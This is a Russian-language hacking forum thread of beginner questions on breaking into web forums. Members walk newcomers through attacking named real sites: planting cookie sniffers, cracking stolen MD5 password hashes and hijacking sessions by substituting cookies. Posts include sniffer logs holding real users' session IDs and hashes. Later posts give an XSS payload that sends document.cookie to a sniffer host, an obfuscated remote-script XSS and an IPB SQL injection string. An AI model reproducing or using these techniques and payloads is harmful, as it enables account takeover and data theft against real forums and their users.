Итак =)) чтоб не писать по тупому "Помогите взломать форум" попробую локализировать мою проблему и четко сформулировать вопросы.
Итак что я ПОНЯЛ во взломах форумов:
1)Чтобы получить пасс админа, нужно получить доступ к некоей базе данных.
2)чтобы получить доступ к ней нужно найти уязвимость на форуме и, воспользовавшись ей послать базе данных команду.
Теперь что я не понял:
Где взять учебник/доку, чтоб я мог самостоятельно составлять sql команды :confused:

MySQL (http://netsec.ru/modules.php?name=articles&theme=2&page=stat&read=yes&mess=1131952246)
MSSQL (http://netsec.ru/modules.php?name=articles&theme=2&page=stat&read=yes&mess=1131952282)

также рекомендую посещать Секюрити сайты например www.securitylab.ru и другие

Nu i konechno chitat forum nashego lubimogo Achata.

http://dev.mysql.com/doc/

Итак =)) чтоб не писать по тупому "Помогите взломать форум" попробую локализировать мою проблему и четко сформулировать вопросы.
Итак что я ПОНЯЛ во взломах форумов:
1)Чтобы получить пасс админа, нужно получить доступ к некоей базе данных.
2)чтобы получить доступ к ней нужно найти уязвимость на форуме и, воспользовавшись ей послать базе данных команду.
Теперь что я не понял:
Где взять учебник/доку, чтоб я мог самостоятельно составлять sql команды :confused:
Вариант #2.
Заходишь на форум который в дальнейшем будет играть роль твоей жертвы. Пытаешся узнать версию и производителя форума:
Пример
PHPbb 2.0.6
Invision Power Board(U) v1.3 Final
FastBBНаходишь сплоит под данный форум и версию, читаешь/спрашиваешь как его юзать.
Юзаешь...
Получаешь/не получаешь свои права на админа/модера

Вот я тут погулял по Инету... форумы повидал... и в чем прикол, тестю форумы на уязвимости, ну типа скрипт.php?тототото=' и ноль реакции, иногда выкидывает на пустую страницу, иногда возвращает на главную, но ниразу не было, чоб выдало sql ошибку =((( Некоторые phpBB форумы вообще кретинские какието, там все темы хранятся в .htm файлах, и никаких тебе viewtopic.php точнее он есть, но какой бы номер темы я ни набрал, форум ругается, мол нет такой темы =((

ну типа скрипт.php?тототото=' и ноль реакции
не у всех программистов руки кривые.
Некоторые phpBB форумы вообще кретинские какието, там все темы хранятся в .htm файлах, и никаких тебе viewtopic.php точнее он есть, но какой бы номер темы я ни набрал, форум ругается, мол нет такой темы =((
не форумы кретинские. это мод.

Ладно, значит в моей потенциальной жертве способ sql инъекции отпадает =( Тогда вопрос, какими способами можно залить шелл на форум (phpBB 2)

Через уязвимость в highlights, а также через правку/восстановление базы.

Тогда вопрос, какими способами можно залить шелл на форум (phpBB 2)

Вопрос не однократно поднимался в этом разделе. И по полочкам разложен. Обмусоливали уже эту тему.

Воспользуйся поиском по форуму.

Вопрос не однократно поднимался в этом разделе. И по полочкам разложен. Обмусоливали уже эту тему.

Воспользуйся поиском по форуму.
Помогите с http://www.noextreme.com/nobugs/
надо узнать какая версия и как куки подменит!
Я е4о токо начинаю поэтому нуждаюсь в помиощи!

Так это phpBB 2*, для подмена куков используй Браузер Opera

Так и на етом спасибо!Я туда на форум снифф закинул пришёл лог-REFERER: http://www.noextreme.com/nobugs/posting.php?mode=topicreview&t=447
QUERY: 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";i:108;}; phpbb2mysql_sid=62b4ea9dafb68dbfc645d5a64ff0c913; phpbb2mysql_t=a:1:{i:447;i:1133462995;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) а что с ним делать я незнаю яж токо начинаюшй мне надо знать что из лога выташить и что заменить в опере!

ах да мне ещё сказали что он паченый www.noextreme.com/bugs етот сайт с форумом существует не давно

Так и на етом спасибо!Я туда на форум снифф закинул пришёл лог-REFERER: http://www.noextreme.com/nobugs/posting.php?mode=topicreview&t=447
QUERY: 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";i:108;}; phpbb2mysql_sid=62b4ea9dafb68dbfc645d5a64ff0c913; phpbb2mysql_t=a:1:{i:447;i:1133462995;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) а что с ним делать я незнаю яж токо начинаюшй мне надо знать что из лога выташить и что заменить в опере!

Вот так и ломай-закидывай воровку кук и получай куки на персональный сниффер (s.netsec.ru). С куками делать вот что:
1)Можно расшифровать хэш( у тебя e10adc3949ba59abbe56e057f20f883e), инфы много. Например ксати у тебя в логе пасс 123456 =)

2)Подставить куки.
Устанавливаешь Оперу,там заходишь Инструменты=>Дополнительно=>Куки
Находишь свой форум, там будут phpbb2mysql_data и остальное типа phpbb2mysql_sid. Тебе нужно phpbb2mysql_data, останое удаляй. В phpbb2mysql_data подставляй своё значение a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";i:108;}
закодированное здесь: http://webmastertools.narod.ru/OnlineTools/url_decode.html

Не забываем про репутацию. =)

Вот так и ломай-закидывай воровку кук и получай куки на персональный сниффер (s.netsec.ru). С куками делать вот что:
1)Можно расшифровать хэш( у тебя e10adc3949ba59abbe56e057f20f883e), инфы много. Например ксати у тебя в логе пасс 123456 =)

2)Подставить куки.
Устанавливаешь Оперу,там заходишь Инструменты=>Дополнительно=>Куки
Находишь свой форум, там будут phpbb2mysql_data и остальное типа phpbb2mysql_sid. Тебе нужно phpbb2mysql_data, останое удаляй. В phpbb2mysql_data подставляй своё значение a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";i:108;}
закодированное здесь: http://webmastertools.narod.ru/OnlineTools/url_decode.html

Не забываем про репутацию. =)
Блин ну вы и профы уже и пасс открылй!=)
Я те в аську стукну ок? А вот ещё вопрос на форуме я ДОПУСТИМ сделал тему, поставвил снифф, на тему мне ответил модератор, пришёл лог мне на снифф, и через куки я сломать могу етого модера?

Да, можешь. Причём даже не обязательно чтоб он отвечал на тему-достаточно того чтоб он просмотрел твоё сообщение.

QUERY: 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"69c5478176f13095f423c0a0fd305a32";s:6:"userid";i:9;}; cpg11d_data=YTo0OntzOjI6IklEIjtzOjMyOiIxNjZlMTg5Mz c0Y2MzMzlhNTNjMDBlODcxYjhkNTQ2OCI7czoyOiJhbSI7aTox O3M6MzoibGl2IjthOjU6e2k6MDtzOjM6IjE2NiI7aToxO3M6Mz oiMTQ3IjtpOjI7czozOiIxMjEiO2k6MztzOjM6IjE2MyI7aTo0 O3M6MjoiMzYiO31zOjY6InNlYXJjaCI7czo3OiIjIyNpbGphIj t9; phpbb2mysql_sid=9d87cc5b1ec3b7950a87132495c5416e; phpbb2mysql_t=a:1:{i:447;i:1133523698;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iebar; acc=username; (username)) vot log ondogo polzovatelja! ter nado
69c5478176f13095f423c0a0fd305a32 esli eto rashifrovat to polu4itsa pass? esli da to 4erez kakuju progu

PasswordsPro.

www.insidepro.com

QUERY: 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"69c5478176f13095f423c0a0fd305a32";s:6:"userid";i:9;}; cpg11d_data=YTo0OntzOjI6IklEIjtzOjMyOiIxNjZlMTg5Mz c0Y2MzMzlhNTNjMDBlODcxYjhkNTQ2OCI7czoyOiJhbSI7aTox O3M6MzoibGl2IjthOjU6e2k6MDtzOjM6IjE2NiI7aToxO3M6Mz oiMTQ3IjtpOjI7czozOiIxMjEiO2k6MztzOjM6IjE2MyI7aTo0 O3M6MjoiMzYiO31zOjY6InNlYXJjaCI7czo3OiIjIyNpbGphIj t9; phpbb2mysql_sid=9d87cc5b1ec3b7950a87132495c5416e; phpbb2mysql_t=a:1:{i:447;i:1133523698;}
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iebar; acc=username; (username)) vot log ondogo polzovatelja! ter nado
69c5478176f13095f423c0a0fd305a32 esli eto rashifrovat to polu4itsa pass? esli da to 4erez kakuju progu
aerozol - Вот тебе пасс!=))
Не забываем плиз про репутацию!;)

aerozol - Вот тебе пасс!=))
Не забываем плиз про репутацию!;)
Delo v tom4to 4elu s foruma ja emu v aske napisal 4tob on zasol n snifferskuju temu! ja znal etogo 4ela nik!!!!!!!! kak toko on zassol ja proveril log zatem ja slomal passs! a NIK JA ZNAL!
no kak mne v sledujussi raz bit pridjot log pass rashefruju, a nika ne zanju! a esli eto budet admin? to 4to dalse? kak nik uznat :(

Очень легко. К тебе на сниффер приходит userid чела. (У этого чела 9). Вот по нему и смотри.

s:6:"userid";i:9;

a kak nu -useid 9- eto toze nado rashifrovivat ili 4to 4tob nik polu4ti

Короче, смотри:
http://www.noextreme.com/nobugs/profile.php?mode=viewprofile&u=87

Вот эта инфа о пользователе aRk0n.

Чтобы узнать чьи куки - подставляй вместо "87" userid того юзера чьи куки отснифовал.

o nifigase, spasibo te ogromnoe ! a vot poslednii vopros
vot osnovnoilog odnogo 4ela nu s togo foruma 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";i:9;}; phpbb2mysql_sid=ca9d651abb7c44df310f6a3e195c0a02; phpbb2mysql_t=a:1:{i:427;i:1133548216;} tut est - e10adc3949ba59abbe56e057f20f883e - eto passs zasifrovanni! tak? tak vot po4emu mne na sniff 3 raza priletel kuk
vot takoi- 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"";s:6:"userid";i:9;}; phpbb2mysql_sid=ca9d651abb7c44df310f6a3e195c0a02; phpbb2mysql_t=a:1:{i:427;i:1133548216;} koro4e bez zasifrovannago passa?

o nifigase, spasibo te ogromnoe ! a vot poslednii vopros
vot osnovnoilog odnogo 4ela nu s togo foruma 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"e10adc3949ba59abbe56e057f20f883e";s:6:"userid";i:9;}; phpbb2mysql_sid=ca9d651abb7c44df310f6a3e195c0a02; phpbb2mysql_t=a:1:{i:427;i:1133548216;} tut est - e10adc3949ba59abbe56e057f20f883e - eto passs zasifrovanni! tak? tak vot po4emu mne na sniff 3 raza priletel kuk
vot takoi- 12phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"";s:6:"userid";i:9;}; phpbb2mysql_sid=ca9d651abb7c44df310f6a3e195c0a02; phpbb2mysql_t=a:1:{i:427;i:1133548216;} koro4e bez zasifrovannago passa?

Да, это хэш(зашифрованный мд5 пароль)

Пароль этого юзера 123456

А куки могут приходить и без зашифрованного пасса-есть чел не поставил галку "запомнить"(автологин)-тогда ничего с куками не сделаешь.

http://s28.yousendit.com/d.aspx?id=1VQM5MMWNICCE39OL63FU3FJQ0
посмотрите там скрин форума phpbb 4ото не идёт снифф не как не залить? в 4ём проблема?

http://s28.yousendit.com/d.aspx?id=1VQM5MMWNICCE39OL63FU3FJQ0
посмотрите там скрин форума phpbb 4ото не идёт снифф не как не залить? в 4ём проблема?De-x, тема называется " Общие вопросы по взлому форумов...", а не частные.

Под общими вопросами имеется ввиду, например, последовательность дейтвий при той или иной атаке, а не сам способ её осуществления.

Что ето за хэш "276542400438dfbdc8c9fc1.10489377"? Когда кодирую a:2:{s:11:"autologinid";s:32:"276542400438dfbdc8c9fc1.10489377";s:6:"userid";i:2969;}; с помощью http://webmastertools.narod.ru/OnlineTools/url_decode.html получаеться
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A% 22276542400438dfbdc8c9fc1.10489377%22%3Bs%3A6%3A%2 2userid%22%3Bi%3A2969%3B%7D%3B
Подставляю и ничего не происходит!=( Может с "276542400438dfbdc8c9fc1.1048937" что-то не то? В чём проблема?

Может с "276542400438dfbdc8c9fc1.1048937" что-то не то? В чём проблема?Уже апсуждалась,ф поиск.
зы:Еще раз будете копипастить(вставлять) логи со сниффера без надобности буду несщадно резать сообщения и понижать репутацию.

Уже апсуждалась,ф поиск.
Хорошо!
Но не проще просто ответить? Раз ето уже опсуждалось думаю ответ должен быть именно в етой теме: "Общие вопросы по взлому форумов..." (типа FAQ)...
апсуждалось, ты имееш в виду ето сообщение в теме http://forum.antichat.ru/threadnav10757-3-10.html: С 18й версии в куках нет хэша. Вместо него пустота или примерно такое число 15539923884383294c4ad690.68000462
Совсем по другому обрабатываются сессии. Оч. интересно... Но не понятно.
Добавлено qBiN'ом:
Непонятно? Погляди в исходник! =)
Очень полный ответ =(

De-x, тема называется " Общие вопросы по взлому форумов...", а не частные.

Под общими вопросами имеется ввиду, например, последовательность дейтвий при той или иной атаке, а не сам способ её осуществления.

Так я и српашиваю!

Так я и српашиваю!
А ты спрашиваешь как залить сниффер в определённый форум.
Это обсуждается в куче других топиков.
Например http://forum.antichat.ru/thread10757.html
http://forum.antichat.ru/thread11207.html

Хорошо!
Но не проще просто ответить?
Нет,представляешь каждому юзеру ачата приспичит написать 2 таких сообщения как у тебя а нам и отвечать на один и тот же вопрос.ПРикинь во что форум превратится?!
Раз ето уже опсуждалось думаю ответ должен быть именно в етой теме: "Общие вопросы по взлому форумов..." (типа Faq)..."Типа Faq" будет но не щас.
апсуждалось, ты имееш в виду ето сообщение в темевозможно.
зы прекращаем флудить.
-----
Скачал я форум phpbb 2.0.18 пока еще не ставил,терь хеши не хранятся в куках, для этого появилась спец таблица session_keys вроде бы или что-то похожее,там вроде и есть все. Кароче когда поставлю его на локалхост напишу.
------
Всё,написал статью,все похожие вопросы должны отпасть.

Всем добрый день (или кому как)! Я новичок у вас так что строго не судите! Почитал, но честно говоря я полный профан в ваших терминах...
"Общие вопросы по взлому форумов..." решил написать в данной теме так как меня остро интерисует на данный момент эта тема. В инете я недавно (с весны) и хотел бы научиться хотя бы простым вещам, но плохо понимаю ваши умные слова, вот набрался решимости спросить у вас с чего начинать лучше?

Den007 Форум для начала перечитай весь=)))
Задавай конкретный вопросы плиз. И для вопроса "С чего начинать лучше?" ты выбрал не верную тему ИМХО!

Den007 Форум для начала перечитай весь=)))
Задавай конкретный вопросы плиз. И для вопроса "С чего начинать лучше?" ты выбрал не верную тему ИМХО!
извините пож. я конечно попробую перечитать весь форум, но боюсь что я врядли что пойму.........
Спасибо за взаимопонимание и ответ который занял Ваше время!

Как взломать такой форум. Дайте хотя бы зацепку. Кстти самый крутой политфорум Украины http://193.178.146.33/list.php?2

Stas13 Причём тут эта тема?! Канчаем флудить! Тут, как я понимаю, должны задаваться вопросы ответы на которые увидеть хочешь не только ты. Только актуальные и часто задаваемые вопросы. "Как взломать политфорум Украины" это сюда не подходит! ИМХО!!!

Вариант #2.
Заходишь на форум который в дальнейшем будет играть роль твоей жертвы. Пытаешся узнать версию и производителя форума

В случае Ipb как узнать версию форума?

brlamo, https://forum.antichat.ru/thread11615.html

https://forum.antichat.ru/thread15678.html

такой вопрос: если у меня снизу страницы форума написано Powered by PN_phpBB_14 version 1.7.3.2, то какая версия форума? 1,7,3,2 или какая-то другая?

такой вопрос: если у меня снизу страницы форума написано Powered by PN_phpBB_14 version 1.7.3.2, то какая версия форума? 1,7,3,2 или какая-то другая?
это модуль форума к PostNuke, версии 1.7.3.
http://postnuke.ru/modules.php?op=modload&name=phpBB_14&file=index&action=viewforum&forum=64

это модуль форума к PostNuke, версии 1.7.3.
а тут есть оюзор его узявимостей, просто в прикрепленных темах что-то не нашел такого

помогите использовать уязвимость в 2.0.20.. чо то я с этим аватарам.. не понимаю как чо делать

скажите правильно, ли я всё зделал

создал тему и в посте написал (без звёздочек) :
[em*ail]wj@wj[ur*l=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+docu*ment.cookie);`


А на снифер ни чего неприходит

почему?

адрес сниффера http://old.antichat.ru/cgi-bin/s.jpg

спс огромное помогло!

еще вопрос: а ,если код поместить в подпись он будет работать?

Что можно сделать с Ipb 2.1.7 ? ведь это одна из самых взломостойких версий.. в идеале нужен шелл ) паролей до админки пока нет. ремоут пасс чейнджер (эксплоит на перле что ли ) не работает ( видимо патченный форум . )

OMG!!, а если попробовать поискать на milw0rm.com или Securitylab.ru эксплоиты? Какие цели ты преследуешь? Поломать любыми способами? Или утянуть хеш администратора?

Ershik, являясь администратором ресурсов в своей сети.. хеш админа на этом форуме у меня есть.. буду надеятся, что он совпадет с админкой на его форуме.. но хеш жесток, и пока его не взломали. Цель - получить доступ к кое-чему на этом сервере. Самое дырявое на том ресурсе - пожалуй сайт на джумле ( проверял все компоненты.. ничего путного нет ) и этот форум.. :-) вот..

Я не понял 1)xss(активные и пассивные)
Смотрите значит я пишу просто пост вставляю этот когд потом юзер что должен сделать? нажать на мой пост или нажать на тот код или как? и потом на какой снифер должны прийти кукис? как я с того снифера смогу их достать?

hi мне на форуме нужно 200 постов чтоб инфу читать..
allcheats.ru/t47219/
мне бы любой акк с 200 месагами..
стоит булка переделанная, брут будет долго... хсс.. чтот не разкрутил..модулей не обнаружил.
короче) вопрос КАК можно чтото сделать?


OMG!!
IPB 2.1.7 remote password changer будет работать только есть debug level = 3
осталась скуля:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
и хсс:
http://www.vital.h.com.ua/ onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =.gif

Знатоки,помогите:

forum/weblogs_news.php?=&order=&start=-20

пишет:

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 7

SELECT e.entry_id, e.entry_access, e.entry_subject, e.entry_time, e.entry_views, e.entry_poster_id, e.entry_text, e.bbcode_uid, e.entry_mood, e.entry_currently, e.currently_text, e.entry_replies, u.user_id, u.username FROM weblog_entries AS e, users AS u WHERE entry_access <= 0 AND e.entry_poster_id = u.user_id AND e.entry_deleted <> 1 ORDER BY entry_id DESC LIMIT -20, 20

Line : 150
File : weblogs_news.php

здесь можно сделать SQL inj?

mash16
иньекция как я понимаю в лимите..

как узнать пароль админа на форуме Invision Power Board v1.3.1 Final ?? помогите плиз

Люди а не подскажете как можно брутить форумы на phpBB а то у меня акк угнали а я надеюсь вернуть брутом или чем нить другим я лично форум ломать не хочу а только свой акк вернуть
Плизз поделитесь опыцтом в етих делах с чего начать или кратко поясните

Товарищи, прошу помочь!

Дано: форум Bulletin® v3.8.0 Release Candidate 1, мой аккаунт с правами юзера.

Необходимо: удалить свой профиль.

Решение: как????

Доп.инфа: облазил всю вкладку Мой кабинет - нет и намека на кнопку "Удалить профиль".

Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???

Такая проблема.
Я сделал заказ на создание сайта под ключ (http://www.web.64x.ru/), у меня есть проект игровой базы. Не подумайте, что для меня изготовление сайта какая-та сложность, просто Москва (http://www.web.64x.ru/)слишком большой город с большими возможностями, всего сам не успеешь сделать, приходится выбирать и ставить приоритеты. Так, вот собственно вопрос. Где лучше хранить мой объм, снимать место на серваке или воспользоваться файлобменником? И если всё же файлобменником, то как обезопасится от того, чтобы ссылки на хранимые мною файлы не менялись?
Заранее спасибо за ответ.

http://leninogorsk.ru/forum/index.php?sid= что тут можно сделать??? Подскажите Нач...у С Меня причетается по червонцу.... ))) (за оказанную пом....)